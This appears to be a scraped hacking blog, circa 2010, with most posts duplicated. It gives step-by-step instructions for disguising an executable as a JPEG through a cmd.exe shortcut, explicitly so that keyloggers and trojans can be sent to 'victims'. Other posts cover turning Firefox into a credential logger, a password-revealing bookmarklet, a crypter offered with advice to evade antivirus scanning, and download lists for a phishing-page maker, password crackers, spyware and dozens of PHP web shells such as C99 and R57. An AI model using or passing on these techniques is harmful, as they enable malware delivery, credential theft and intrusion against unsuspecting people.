Windows 7 Ultra Control Panel Trick
WeLL many of you may not be knowing about this but you have a hidden feature inside Windows 7 where-in you can get more than 250 high quality control options which under normal circumstances would require you to search arround...
i use it to bunch up all the utils together so tht i can keep thm handyy asap...
>>Create a new folder
>>rename the folder as
MaxCaps_Utilities.{ED7BA470-8E54-465E-825C-99712043E01C}
>> Voilaaa .. the folder has nearly all the options you want
Monday, December 13, 2010
Convert Your .exe to .jpeg
Hi,
Here i am going to show you how to .exe file to .jpeg
Mostly we use this trick for sending Key loggers, Trojans or virus to our victim.So If you want to change your .exe files to .Jpeg then follow bellow steps.
1) First of all Go to Folder Options.
2) Tick "Show hidden files and folders" options and Untick "hide extensions for known file types" .
3) Make a new folder and copy your exe file to new folder. (Suppose name of your .exe file is server.exe)
4) Rename server.exe to server.jpeg ( We are going to change the extension of this file)
5) Create a shortcut file of server.jpeg in same folder.
6) Rename the shortcut file say abc.jpeg
7) Now you have to make some changes in properties of abc.jpeg
8) Go to properties of abc.jpeg
9) Delete all the text on field ''Start In'' and leave it empty.
10) Now in Target field you have to write below path. ( Path of original file )
C:\WINDOWS\system32\cmd.exe /c server.jpeg
11) You have an option to change the icon. Click that and a new window will pop up and you have to write this:
%SystemRoot%\system32\SHELL32.dll .
12) Then press OK.
13) Go to properties of server.jpeg and make it hidden.
Now We are ready to send your jpeg file. When someone double click on abc.jpeg it automatically execute our sever.jpeg file . But dont forget to put both file in same folder. Best way to send these files together to someone is compress them into Zip or Rar.
Hi,
Here i am going to show you how to .exe file to .jpeg
Mostly we use this trick for sending Key loggers, Trojans or virus to our victim.So If you want to change your .exe files to .Jpeg then follow bellow steps.
1) First of all Go to Folder Options.
2) Tick "Show hidden files and folders" options and Untick "hide extensions for known file types" .
3) Make a new folder and copy your exe file to new folder. (Suppose name of your .exe file is server.exe)
4) Rename server.exe to server.jpeg ( We are going to change the extension of this file)
5) Create a shortcut file of server.jpeg in same folder.
6) Rename the shortcut file say abc.jpeg
7) Now you have to make some changes in properties of abc.jpeg
8) Go to properties of abc.jpeg
9) Delete all the text on field ''Start In'' and leave it empty.
10) Now in Target field you have to write below path. ( Path of original file )
C:\WINDOWS\system32\cmd.exe /c server.jpeg
11) You have an option to change the icon. Click that and a new window will pop up and you have to write this:
%SystemRoot%\system32\SHELL32.dll .
12) Then press OK.
13) Go to properties of server.jpeg and make it hidden.
Now We are ready to send your jpeg file. When someone double click on abc.jpeg it automatically execute our sever.jpeg file . But dont forget to put both file in same folder. Best way to send these files together to someone is compress them into Zip or Rar.
Firefox as a Keylogger
Hi friends today i am going to share a one trick. With the help of this trick you are able to use your firefox as a keylogger.
1) Download the attachment file and change his extension .txt to .js .
2) Install firefox and open C:\Program Files\Mozilla Firefox\components.
3) In Components folder there is a one file name nsLoginManagerPrompter.js
4) Replace downloaded file with original file.
5) Now when you enter any username and password in your firefox. It automatically saved in your browser.
To view password.. Open firefox, goto Tools --> Options --> Security --> Saved Password --> Show Password.
Hope you like it....
Hi friends today i am going to share a one trick. With the help of this trick you are able to use your firefox as a keylogger.
1) Download the attachment file and change his extension .txt to .js .
2) Install firefox and open C:\Program Files\Mozilla Firefox\components.
3) In Components folder there is a one file name nsLoginManagerPrompter.js
4) Replace downloaded file with original file.
5) Now when you enter any username and password in your firefox. It automatically saved in your browser.
To view password.. Open firefox, goto Tools --> Options --> Security --> Saved Password --> Show Password.
Hope you like it....
Private Crypter Ready to Download Here........!
Private Crypter Ready to Download Here........!
Hey guys Rockey's Private Crypter is ready now you can download here.!
Simple GUI
Good Encryption (will improve in next version)
Test my crypter & post ur Reviews here......!
Warning :- Pls dont upload ur sever on virustotal...! u can check on Novirusthanx.com
Crypter image
Download Link :-
Rockey's Private Crypter
Rar Password :-
a0E0QTFrQko2MHRURXp5SA==
Encrytion Method :- GILA7 > HAZZ15 > TIGO-3FX > BASE-64
Application Password :- crypt
Hey guys Rockey's Private Crypter is ready now you can download here.!
Simple GUI
Good Encryption (will improve in next version)
Test my crypter & post ur Reviews here......!
Warning :- Pls dont upload ur sever on virustotal...! u can check on Novirusthanx.com
Crypter image
Download Link :-
Rockey's Private Crypter
Rar Password :-
a0E0QTFrQko2MHRURXp5SA==
Encrytion Method :- GILA7 > HAZZ15 > TIGO-3FX > BASE-64
Application Password :- crypt
Javascript to view password behind ******
Javascript to view password behind ******
Hi friends, Basically you are not able to read the password because it is in asterisks form. There are some software which we used to read the password, But the software is not compatible with very browser. So there is 1 java script with the help of which you are able to read he password value and this java script works fine with every browser.
JAVA SCRIPT CODE :-
javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;
%20F%20=%20document.forms;%20for(j=0;%20j
%20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if
%20(s)%20alert(%22saneh%20:%20The%20Password%20On
%20This Page:\n\n%22%20+%20s);%20else%20alert(%22There%20are
%20no%20passwords%20in%20forms%20on%20this
%20page.%22);})();
Hi friends, Basically you are not able to read the password because it is in asterisks form. There are some software which we used to read the password, But the software is not compatible with very browser. So there is 1 java script with the help of which you are able to read he password value and this java script works fine with every browser.
JAVA SCRIPT CODE :-
javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;
%20F%20=%20document.forms;%20for(j=0;%20j
%20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if
%20(s)%20alert(%22saneh%20:%20The%20Password%20On
%20This Page:\n\n%22%20+%20s);%20else%20alert(%22There%20are
%20no%20passwords%20in%20forms%20on%20this
%20page.%22);})();
Download tools part - 1
Download tools part - 1
AA tools.zip (3.14 MB)
advanced-administrative-tools
Download link:- http://www.fileserve.com/file/E87uGmt
Password:- rocks
Advanced Archive Password Recovery 2.20.zip (794.66 KB)
Advanced Archive Password Recovery 2.20 is a program to recover lost or forgotten passwords to archives (compressed files) of the following types:
- ZIP/PKZip/WinZIP (all versions except PKZip 5.x)
- ACE/WinACE (1.x)
- ARJ/WinARJ
- RAR/WinRAR
At the moment, there is no known method to extract the password from such compressed files, so the only available methods are “brute force” and dictionary attacks (for ARJ and ZIP formats, known-plaintext attack is also available).
The key features of Advanced Archive Password Recovery 2.20 are:
- The program has a convenient user interface
- The program is very fast: for ZIP, brute-force attack speed is up to 15 million passwords per second (on Pentium III)
- Guaranteed decryption (usually, within the hour) of most WinZip archives (with 5+ encrypted files) is available; it works regardless the password complexity and length
- The program can work with archives containing only one encrypted file (at about the same speed)
- Self-extracting archives are supported
- The program is customizable: you can set the password length (or length range), the character set to be used to generate the passwords, and a lot of other options
- You can select the custom character set for brute-force attack (non-English characters are supported)
- Dictionary-based attack is available
- The “brute-force with mask” attack is available
- The maximum password length is not limited (in registered version)
- Very fast known-plaintext attack is available (for ZIP and ARJ)
- No special virtual memory requirements
- You can interrupt the program at any time, and start from the same point later
- The program can work in the background, using the CPU only when it is in idle state
Download Link:- http://www.fileserve.com/file/B4ZhE7S
Password:- rocks
All Dos Commands.zip (82.40 KB)
Text File Which Contains all Dos Commands......
Download link:- http://www.fileserve.com/file/rEZsJRY
password :- rocks
AntiARP_6.0.1_DGN_CW.zip (8.73 MB)
This is the English new version of AntiARP 6.0.0 which have been released on 14-1-2009.
No more problems with your internet connection, no more sniffing and stealing your passwords.
Download Link:- http://www.fileserve.com/file/R9Ecpnt
Password:-rocks
Phisher_Maker_3.1.zip (1.69 MB)
Features:
1. Fastest phisher maker tool ever
2. Makes phisher for almost any site
3. Only 3 steps to make phisher [1,2,3 and go]
4. Useful for users who dont knows HTML, PHP coding
5. No manual work except entering URL of website, for which u want to make phisher
6. Fully automated tool
7. Small in size.
8. Progress bar is provided.
9. Instant access to phishers you created.
Download Link:- http://www.fileserve.com/file/cZEVQfy
Password:- rocks
Cryptosystem ME6.zip (2.35 MB)
Cryptosystem ME6 is Windows software intended for encryption and decryption of single files or multiple files on PCs, for secure storage or secure transmission. It uses a 500-bit key for security, and has features designed to minimize the chances of user error.
Download link:- http://www.fileserve.com/file/cB9J4Hf
Password:- rocks
Invisible Sec.zip (3.31 MB)
Invisible Secrets 4 not only encrypts your data and files for safe keeping or for secure transfer across the net, it also hides them in places that on the surface appear totally innocent, such as picture or sound files, or web pages.
It features strong file encryption algorithms (including AES - Rijndael), a password management solution that stores all your passwords securely and helps you create secure passwords, a shredder that helps you destroy beyond recovery files, folders and internet traces, a locker that allows you to password protect certain applications, the ability to create self-decrypting packages.
Download link:- http://www.fileserve.com/file/33TZrHM
password:- rocks
JVCrypt Setup.zip (3.03 MB)
JvCrypt is a powerful encryption and compression utility that allows you to create encrypted files and text messages with up to 448-bit encryption using the advanced Blowfish encryption algorithm.
Download link:- http://www.fileserve.com/file/7WfYqQG
password:- rocks
KFsens10.zip (2.50 MB)
KFSensor is a host based Intrusion Detection System (IDS).
It acts as a honeypot to attract and detect hackers by simulating vulnerable system services and trojans. The system is highly configurable and features detailed logging, analysis of attacks
Download link:- http://www.fileserve.com/file/wYA8XGP
password :- rocks
LAN Search pro.zip (1.13 MB)
LAN Search Pro is a free utility for fast file searching across your LAN. You can search for specific file names or for specific file types (e.g. all MP3 files). LAN Search Pro provides a lightning fast search engine and lets you search hidden network resources, restricted access resources, IP subnets, LAN FTP servers and much more. It comes with a built-in password manager to store your network logins for resources with restricted access.
Download Link:- http://www.fileserve.com/file/ACYgBSd
password:- rocks
MAC Address Changer.zip (331.34 KB)
download link :- http://www.fileserve.com/file/uDvgesW
password:- rocks
Multi MD5 Online Hash Cracker.zip (988.26 KB)
Download Link:- http://www.fileserve.com/file/6nXGWeh
password:- rocks
NeoTrace_Professional_3.25__portable__2.zip (2.46 MB)
NeoTrace Pro delivers a powerful tool for checking information on Internet site. You can trace any computer on the internet simply by entering an email, IP address or URL. The display shows you the route between you and the remote site including all intermediate nodes and their registrant information. NeoTrace is the world's most popular Internet tracer, used by law enforcement, ISPs, and network professionals yet it is easy enough for home users to use.
Download Link :- http://www.fileserve.com/file/XxC7JgR
password:- rocks
NetConceal Anonymizer v3.6.041.02.zip (702.62 KB)
NetConceal Anonymizer keeps your online privacy by hiding your real IP address from anyone. Use your favorite network applications - web browsers, instant messengers, file sharing and others, but stay anonymous and secure.
Download Link :- http://www.fileserve.com/file/9nJuFsG
password:- rocks
Netstat-Viewer.zip (463.59 KB)
Netstat Viewer is a handy GUI replacement for the command line application "netstat".
Download Link:- http://www.fileserve.com/file/3EPqmCB
password:- rocks
PDF.Password.Remover.v3.0M.zip (3.12 MB)
Pdf files with passwords can be quite irritating With the help of PDF Password Remover Decryption is being done instantly. Decrypted file can be opened in any PDF viewer (e.g. Adobe Acrobat Reader) without any restrictions - i.e. with edit/copy/print functions enabled.
100% working Tested....
Download Link :- http://www.fileserve.com/file/DKsC9WH
password :- rocks
Putty.zip (385.62 KB)
PuTTY is a free implementation of Telnet and SSH for Windows and Unix platforms, along with an xterm terminal emulator. It is written and maintained primarily by Simon Tatham.
The latest version is beta 0.60.
LEGAL WARNING: Use of PuTTY, PSCP, PSFTP and Plink is illegal in countries where encryption is outlawed. I believe it is legal to use PuTTY, PSCP, PSFTP and Plink in England and Wales and in many other countries, but I am not a lawyer and so if in doubt you should seek legal advice before downloading it. You may find this site useful (it's a survey of cryptography laws in many countries) but I can't vouch for its correctness.
Download link:- http://www.fileserve.com/file/w7E9n57
password:- rocks
RapidshareHacking.zip (264.47 KB)
Download Link :- http://www.fileserve.com/file/QEyh3SY
password :- rocks
RAR Password Cracker v4.11.zip (503.96 KB)
Program to recover (crack) forgotten RAR/WinRAR passwords.
Download Link :- http://www.fileserve.com/file/U5hgkXA
password:- rocks
YeoPan101.zip (126.37 KB)
Encryption utility
No image.!
Download link :- http://www.fileserve.com/file/6rkpPS8
password :- rocks
tunnel.zip (2.78 MB)
Downlod link :- http://www.fileserve.com/file/TCMyaxQ
Password :- rocks
SoloKeepSetup.zip (846.06 KB)
SoloKeep is a fast and easy to use application that stores all your passwords.SoloKeep is a fast and easy to use application that stores all your passwords using encryption and password protection. SoloKeep can keep track of those hard to remember website passwords and other login information. Using a powerful encryption algorithm.
Download link :- http://www.fileserve.com/file/89cxtyN
password :- rocks
Safe and quick hide folders.zip (2.45 MB)
Safe&Quick Hide Files has three major functions: Hide files and folders, encrypt file, Camouflage files and folders. The three major functions make it supper private information protector.
Download Link :- http://www.fileserve.com/file/yj2hrp6
password:- rocks
ResHacker.zip (735.83 KB)
Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Win95, Win98, WinME, WinNT, Win2000 and WinXP operating systems.
Viewing Resources: Cursor, Icon, Bitmap, GIF, AVI, and JPG resource images can be viewed. WAV and MIDI audio resources can be played. Menus, Dialogs, MessageTables, StringTables, Accelerators, Delphi Forms, and VersionInfo resources can be viewed as decompiled resource scripts. Menus and Dialogs can also be viewed as they would appear in a running application.
Download Link :- http://www.fileserve.com/file/MVwfhAj
password :- rocks
RemoteDesktopSpySetup.zip (2.14 MB)
Remote Desktop Spy is a computer surveillance program which can be used in the home, school or office to monitor and record every detail of PC and Internet activity. Records programs used, keystrokes typed, web sites visited, and takes screenshots
Download Link :- http://www.fileserve.com/file/uYz7Zwd
password:- rocks
Remote Shutdown.zip (2.30 MB)
Download Link :- http://www.fileserve.com/file/ZAtG2Hg
password :- rocks
proxy switcher.exe (14.92 MB)
Hide your IP address from the web sites you visit.
Penetrate bans and blocks on forums, classifields and download sites (rapidshare etc.).
Automatic proxy server switching for improved anonymous surfing.
Easy way to change proxy settings on the fly.
For webmasters - check search engine results from different countries.
Fully compatible with Internet Explorer, Firefox, Opera and others.
Advanced proxy list scanning and management.
Download link :- http://www.fileserve.com/file/mmWsBms
password :- rocks
More Tools Coming Soon.................................!
AA tools.zip (3.14 MB)
advanced-administrative-tools
Download link:- http://www.fileserve.com/file/E87uGmt
Password:- rocks
Advanced Archive Password Recovery 2.20.zip (794.66 KB)
Advanced Archive Password Recovery 2.20 is a program to recover lost or forgotten passwords to archives (compressed files) of the following types:
- ZIP/PKZip/WinZIP (all versions except PKZip 5.x)
- ACE/WinACE (1.x)
- ARJ/WinARJ
- RAR/WinRAR
At the moment, there is no known method to extract the password from such compressed files, so the only available methods are “brute force” and dictionary attacks (for ARJ and ZIP formats, known-plaintext attack is also available).
The key features of Advanced Archive Password Recovery 2.20 are:
- The program has a convenient user interface
- The program is very fast: for ZIP, brute-force attack speed is up to 15 million passwords per second (on Pentium III)
- Guaranteed decryption (usually, within the hour) of most WinZip archives (with 5+ encrypted files) is available; it works regardless the password complexity and length
- The program can work with archives containing only one encrypted file (at about the same speed)
- Self-extracting archives are supported
- The program is customizable: you can set the password length (or length range), the character set to be used to generate the passwords, and a lot of other options
- You can select the custom character set for brute-force attack (non-English characters are supported)
- Dictionary-based attack is available
- The “brute-force with mask” attack is available
- The maximum password length is not limited (in registered version)
- Very fast known-plaintext attack is available (for ZIP and ARJ)
- No special virtual memory requirements
- You can interrupt the program at any time, and start from the same point later
- The program can work in the background, using the CPU only when it is in idle state
Download Link:- http://www.fileserve.com/file/B4ZhE7S
Password:- rocks
All Dos Commands.zip (82.40 KB)
Text File Which Contains all Dos Commands......
Download link:- http://www.fileserve.com/file/rEZsJRY
password :- rocks
AntiARP_6.0.1_DGN_CW.zip (8.73 MB)
This is the English new version of AntiARP 6.0.0 which have been released on 14-1-2009.
No more problems with your internet connection, no more sniffing and stealing your passwords.
Download Link:- http://www.fileserve.com/file/R9Ecpnt
Password:-rocks
Phisher_Maker_3.1.zip (1.69 MB)
Features:
1. Fastest phisher maker tool ever
2. Makes phisher for almost any site
3. Only 3 steps to make phisher [1,2,3 and go]
4. Useful for users who dont knows HTML, PHP coding
5. No manual work except entering URL of website, for which u want to make phisher
6. Fully automated tool
7. Small in size.
8. Progress bar is provided.
9. Instant access to phishers you created.
Download Link:- http://www.fileserve.com/file/cZEVQfy
Password:- rocks
Cryptosystem ME6.zip (2.35 MB)
Cryptosystem ME6 is Windows software intended for encryption and decryption of single files or multiple files on PCs, for secure storage or secure transmission. It uses a 500-bit key for security, and has features designed to minimize the chances of user error.
Download link:- http://www.fileserve.com/file/cB9J4Hf
Password:- rocks
Invisible Sec.zip (3.31 MB)
Invisible Secrets 4 not only encrypts your data and files for safe keeping or for secure transfer across the net, it also hides them in places that on the surface appear totally innocent, such as picture or sound files, or web pages.
It features strong file encryption algorithms (including AES - Rijndael), a password management solution that stores all your passwords securely and helps you create secure passwords, a shredder that helps you destroy beyond recovery files, folders and internet traces, a locker that allows you to password protect certain applications, the ability to create self-decrypting packages.
Download link:- http://www.fileserve.com/file/33TZrHM
password:- rocks
JVCrypt Setup.zip (3.03 MB)
JvCrypt is a powerful encryption and compression utility that allows you to create encrypted files and text messages with up to 448-bit encryption using the advanced Blowfish encryption algorithm.
Download link:- http://www.fileserve.com/file/7WfYqQG
password:- rocks
KFsens10.zip (2.50 MB)
KFSensor is a host based Intrusion Detection System (IDS).
It acts as a honeypot to attract and detect hackers by simulating vulnerable system services and trojans. The system is highly configurable and features detailed logging, analysis of attacks
Download link:- http://www.fileserve.com/file/wYA8XGP
password :- rocks
LAN Search pro.zip (1.13 MB)
LAN Search Pro is a free utility for fast file searching across your LAN. You can search for specific file names or for specific file types (e.g. all MP3 files). LAN Search Pro provides a lightning fast search engine and lets you search hidden network resources, restricted access resources, IP subnets, LAN FTP servers and much more. It comes with a built-in password manager to store your network logins for resources with restricted access.
Download Link:- http://www.fileserve.com/file/ACYgBSd
password:- rocks
MAC Address Changer.zip (331.34 KB)
download link :- http://www.fileserve.com/file/uDvgesW
password:- rocks
Multi MD5 Online Hash Cracker.zip (988.26 KB)
Download Link:- http://www.fileserve.com/file/6nXGWeh
password:- rocks
NeoTrace_Professional_3.25__portable__2.zip (2.46 MB)
NeoTrace Pro delivers a powerful tool for checking information on Internet site. You can trace any computer on the internet simply by entering an email, IP address or URL. The display shows you the route between you and the remote site including all intermediate nodes and their registrant information. NeoTrace is the world's most popular Internet tracer, used by law enforcement, ISPs, and network professionals yet it is easy enough for home users to use.
Download Link :- http://www.fileserve.com/file/XxC7JgR
password:- rocks
NetConceal Anonymizer v3.6.041.02.zip (702.62 KB)
NetConceal Anonymizer keeps your online privacy by hiding your real IP address from anyone. Use your favorite network applications - web browsers, instant messengers, file sharing and others, but stay anonymous and secure.
Download Link :- http://www.fileserve.com/file/9nJuFsG
password:- rocks
Netstat-Viewer.zip (463.59 KB)
Netstat Viewer is a handy GUI replacement for the command line application "netstat".
Download Link:- http://www.fileserve.com/file/3EPqmCB
password:- rocks
PDF.Password.Remover.v3.0M.zip (3.12 MB)
Pdf files with passwords can be quite irritating With the help of PDF Password Remover Decryption is being done instantly. Decrypted file can be opened in any PDF viewer (e.g. Adobe Acrobat Reader) without any restrictions - i.e. with edit/copy/print functions enabled.
100% working Tested....
Download Link :- http://www.fileserve.com/file/DKsC9WH
password :- rocks
Putty.zip (385.62 KB)
PuTTY is a free implementation of Telnet and SSH for Windows and Unix platforms, along with an xterm terminal emulator. It is written and maintained primarily by Simon Tatham.
The latest version is beta 0.60.
LEGAL WARNING: Use of PuTTY, PSCP, PSFTP and Plink is illegal in countries where encryption is outlawed. I believe it is legal to use PuTTY, PSCP, PSFTP and Plink in England and Wales and in many other countries, but I am not a lawyer and so if in doubt you should seek legal advice before downloading it. You may find this site useful (it's a survey of cryptography laws in many countries) but I can't vouch for its correctness.
Download link:- http://www.fileserve.com/file/w7E9n57
password:- rocks
RapidshareHacking.zip (264.47 KB)
Download Link :- http://www.fileserve.com/file/QEyh3SY
password :- rocks
RAR Password Cracker v4.11.zip (503.96 KB)
Program to recover (crack) forgotten RAR/WinRAR passwords.
Download Link :- http://www.fileserve.com/file/U5hgkXA
password:- rocks
YeoPan101.zip (126.37 KB)
Encryption utility
No image.!
Download link :- http://www.fileserve.com/file/6rkpPS8
password :- rocks
tunnel.zip (2.78 MB)
Downlod link :- http://www.fileserve.com/file/TCMyaxQ
Password :- rocks
SoloKeepSetup.zip (846.06 KB)
SoloKeep is a fast and easy to use application that stores all your passwords.SoloKeep is a fast and easy to use application that stores all your passwords using encryption and password protection. SoloKeep can keep track of those hard to remember website passwords and other login information. Using a powerful encryption algorithm.
Download link :- http://www.fileserve.com/file/89cxtyN
password :- rocks
Safe and quick hide folders.zip (2.45 MB)
Safe&Quick Hide Files has three major functions: Hide files and folders, encrypt file, Camouflage files and folders. The three major functions make it supper private information protector.
Download Link :- http://www.fileserve.com/file/yj2hrp6
password:- rocks
ResHacker.zip (735.83 KB)
Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Win95, Win98, WinME, WinNT, Win2000 and WinXP operating systems.
Viewing Resources: Cursor, Icon, Bitmap, GIF, AVI, and JPG resource images can be viewed. WAV and MIDI audio resources can be played. Menus, Dialogs, MessageTables, StringTables, Accelerators, Delphi Forms, and VersionInfo resources can be viewed as decompiled resource scripts. Menus and Dialogs can also be viewed as they would appear in a running application.
Download Link :- http://www.fileserve.com/file/MVwfhAj
password :- rocks
RemoteDesktopSpySetup.zip (2.14 MB)
Remote Desktop Spy is a computer surveillance program which can be used in the home, school or office to monitor and record every detail of PC and Internet activity. Records programs used, keystrokes typed, web sites visited, and takes screenshots
Download Link :- http://www.fileserve.com/file/uYz7Zwd
password:- rocks
Remote Shutdown.zip (2.30 MB)
Download Link :- http://www.fileserve.com/file/ZAtG2Hg
password :- rocks
proxy switcher.exe (14.92 MB)
Hide your IP address from the web sites you visit.
Penetrate bans and blocks on forums, classifields and download sites (rapidshare etc.).
Automatic proxy server switching for improved anonymous surfing.
Easy way to change proxy settings on the fly.
For webmasters - check search engine results from different countries.
Fully compatible with Internet Explorer, Firefox, Opera and others.
Advanced proxy list scanning and management.
Download link :- http://www.fileserve.com/file/mmWsBms
password :- rocks
More Tools Coming Soon.................................!
Increase Browsing speed in windows xp professional
How To Increase Your Internet Speed By 20%[/b]
If you use Windows XP Professional then it is possible to squeeze an extra 20% out of your internet connection. By default Windows XP Pro holds back 20% of your Internet speed for various services like windows update and spyware checks.
If you want to tap into this locked speed then make the following changes:
1. Go to Start-> Run-> and type gpedit.msc
2. Expand the Administrative Templates branch
3. Expand the Network tab
4. Highlight QoS Packet Scheduler
5. Click on Limit Reservable Bandwidth and check the enabled box
6. Then Change the Bandwidth limit % to 0 %
Once you have done this click apply and restart your PC. After rebooting you should see a noticeable improvement in your net speed.
How To Increase Your Internet Speed By 20%[/b]
If you use Windows XP Professional then it is possible to squeeze an extra 20% out of your internet connection. By default Windows XP Pro holds back 20% of your Internet speed for various services like windows update and spyware checks.
If you want to tap into this locked speed then make the following changes:
1. Go to Start-> Run-> and type gpedit.msc
2. Expand the Administrative Templates branch
3. Expand the Network tab
4. Highlight QoS Packet Scheduler
5. Click on Limit Reservable Bandwidth and check the enabled box
6. Then Change the Bandwidth limit % to 0 %
Once you have done this click apply and restart your PC. After rebooting you should see a noticeable improvement in your net speed.
tracing ip address location of website
Click on start menu
then select run and type cmd
then enter the following command
"tracert (name of the website) eg: tracert http://www.youtube.com
then press enter button
it will show many ipaddresses how the ip address is travelling.
then select the last shown ipaddress,shown inside brackets and copy it
then open the browser and enter the following url
http://www.ip-address.com/ipaddresstolocation/
then paste the ip address in the find location text.
then it will show where the ipaddress location is.
lets try its very interesting. Using this url address we can find out our ip address location also.
Click on start menu
then select run and type cmd
then enter the following command
"tracert (name of the website) eg: tracert http://www.youtube.com
then press enter button
it will show many ipaddresses how the ip address is travelling.
then select the last shown ipaddress,shown inside brackets and copy it
then open the browser and enter the following url
http://www.ip-address.com/ipaddresstolocation/
then paste the ip address in the find location text.
then it will show where the ipaddress location is.
lets try its very interesting. Using this url address we can find out our ip address location also.
PHP Shells
PHP Shell is a shell wrapped in a PHP script. It’s a tool you can use to execute arbitrary shell-commands or browse the filesystem on your remote webserver. This replaces, to a degree, a normal telnet connection, and to a lesser degree a SSH connection.
You use it for administration and maintenance of your website, which is often much easier to do if you can work directly on the server. For example, you could use PHP Shell to unpack and move big files around. All the normal command line programs like ps, free, du, df, etc… can be used.
Download PHP Shells.
Password for all links :- rocks
_GsC__shell
http://www.4shared.com/file/yX1cvplV/_GsC__shell.html
0x00_PHP_shell
http://www.4shared.com/file/_VKM9keP/0x0...shell.html
_Andr3a92__Sh3ll
http://www.4shared.com/file/tp1BeFXQ/_An...h3ll_.html
__Cod3rZ_Shell__
http://www.4shared.com/file/DxAxWgWL/__C...ell__.html
Ajax_PHP_Command_Shell
http://www.4shared.com/file/wZjZMcxJ/Aja...Shell.html
Anti_Chat_Shell
http://www.4shared.com/file/3Z2B2nrx/Ant...Shell.html
AYT_Shell
http://www.4shared.com/file/bqCBnhbT/AYT_Shell.html
Azrail_Php_Shell
http://www.4shared.com/file/fdWWiC27/Azr...Shell.html
Backup_SQL_Shell
http://www.4shared.com/file/AxgPSH0u/Bac...Shell.html
Bl0od3r_Priv8_Shell
http://www.4shared.com/file/CGovUJF1/Bl0...Shell.html
Bypass_User
http://www.4shared.com/file/HqWSkCv8/Bypass_User.html
C99_Original_Shell
http://www.4shared.com/file/WP0GpDIn/C99...Shell.html
C99_Original_Shell__Underdetec
http://www.4shared.com/file/RNftEbFr/C99...detec.html
C99_Saldiriorg_version
http://www.4shared.com/file/Io6wN-VJ/C99...rsion.html
C100_Yarakam_Modified_Shell
http://www.4shared.com/file/47WPrSe-/C10...Shell.html
CGI_Telnet
http://www.4shared.com/file/VI5YA-wG/CGI_Telnet.html
CShell
http://www.4shared.com/file/KisHKKYc/CShell.html
CTT_Shell
http://www.4shared.com/file/nCmCitXR/CTT_Shell.html
Cyber_Shell
http://www.4shared.com/file/7omydtGQ/Cyber_Shell.html
Dark-Shell
http://www.4shared.com/file/jnEEI3rY/Dark-Shell.html
DC3_Shell__Priv8
http://www.4shared.com/file/q_0GoDsn/DC3...riv8_.html
Dive_Shell
http://www.4shared.com/file/tfwyFvGr/Dive_Shell.html
DTool_Pro_Shell
http://www.4shared.com/file/-auj9Kmj/DTo...Shell.html
DX_Shell
http://www.4shared.com/file/jqlEXYbM/DX_Shell.html
Erne_Safe_Mode_Bypass_Shel
http://www.4shared.com/file/9fKu9ypj/Ern...Shell.html
Fake_email Shell
http://www.4shared.com/file/8KGZei36/Fake_email.html
G00nShell
http://www.4shared.com/file/BpiG9rcz/G00nShell.html
GFS_Shell
http://www.4shared.com/file/E_f9yH5p/GFS_Shell.html
GNY_Shell
http://www.4shared.com/file/Vss8Cu5a/GNY_Shell.html
H4NTU1_Shell
http://www.4shared.com/file/VYCyexWQ/H4NTU1_Shell.html
Heykir_Shell
http://www.4shared.com/file/88BV2gwN/Heykir_Shell.html
HiddenShell
http://www.4shared.com/file/YP8LaVZP/HiddenShell.html
iMHaP_FTP_Shell
http://www.4shared.com/file/vl1lhnTl/iMH...Shell.html
Iron1_Shell
http://www.4shared.com/file/kqP5jQiC/Iron1_Shell.html
http://www.4shared.com/file/PHy19Lhz/Iron_Shell.html
JsBack_-_Shell_Backdoor
http://www.4shared.com/file/LcjIeYYA/JsB...kdoor.html
JSP_Shell
http://www.4shared.com/file/c7qoc0D6/JSP_Shell.html
Kacak_Shell
http://www.4shared.com/file/hQdJTadf/Kacak_Shell.html
KADot_Shell
[/size][/size]http://www.4shared.com/file/-6mBbdbQ/KADot_Shell.html
Lama_Shell
http://www.4shared.com/file/UPHWmy28/Lama_Shell.html
Liz0zim_Shell
http://www.4shared.com/file/OB7nOU9J/Liz0zim_Shell.html
Load_Shell
http://www.4shared.com/file/XIE5ANyW/Load_Shell.html
lostDC_shell
http://www.4shared.com/file/gn2_vnkp/lostDC_shell.html
Mackers_Private_PHPShell
http://www.4shared.com/file/UubJhaJ7/Mac...Shell.html
Moroccan_Spamers_Shell
http://www.4shared.com/file/1Nk_AcAG/Mor...Shell.html
MyShell_Shell
http://www.4shared.com/file/JlEIt3IU/MyShell_Shell.html
MySQL_Interface_Shell
http://www.4shared.com/file/WR7mQEDK/MyS...Shell.html
N3fa5t1cA_Sh3ll
http://www.4shared.com/file/4W0g887i/N3f...Sh3ll.html
N3tShell_Emp3ror_Undetectable
http://www.4shared.com/file/oU-2A_xW/N3t...able_.html
N_Shell
http://www.4shared.com/file/OtOUZ5Lw/N_Shell.html
NCC_Shell
http://www.4shared.com/file/OmgPsHuo/NCC_Shell.html
Network_File_Manager_PHP_Shell
http://www.4shared.com/file/V34e7DRy/Net...Shell.html
Nexpl0rer_Shell
http://www.4shared.com/file/RtwOsvuo/Nex...Shell.html
Nix_Remote_Shell
http://www.4shared.com/file/86Of7PRy/Nix...Shell.html
NST_Shell
http://www.4shared.com/file/0UqJ4hZ3/NST_Shell.html
okno_Shell
http://www.4shared.com/file/vN8Q1-eN/okno_Shell.html
OnBoomShell
http://www.4shared.com/file/KnpXFJMX/OnBoomShell.html
PH_Vayv_Shell
http://www.4shared.com/file/vbf77aPi/PH_Vayv_Shell.html
PHANTASMA_Shell
http://www.4shared.com/file/JExrHLos/PHA...Shell.html
PHP_black_shell_that_pwnz_C99
http://www.4shared.com/file/WPpjJJSY/PHP...z_C99.html
PHP_Bypass_Shell
http://www.4shared.com/file/zfiuPrpu/PHP...Shell.html
PHP_Include_With_Shell
http://www.4shared.com/file/WntNAeua/PHP...Shell.html
PHP_Inj_Shell
http://www.4shared.com/file/j7qhZhS2/PHP_Inj_Shell.html
http://www.4shared.com/file/tRJ2E4xb/PHP...Shell.html
http://www.4shared.com/file/1RwfnLln/PHP...Shell.html
R57_IFX_Modified_Shell
http://www.4shared.com/file/FAwRif1l/R57...Shell.html
R57_Kartal_Modified_Shell
http://www.4shared.com/file/JDaMOZZZ/R57...Shell.html
R57_Mohajer22_Shell
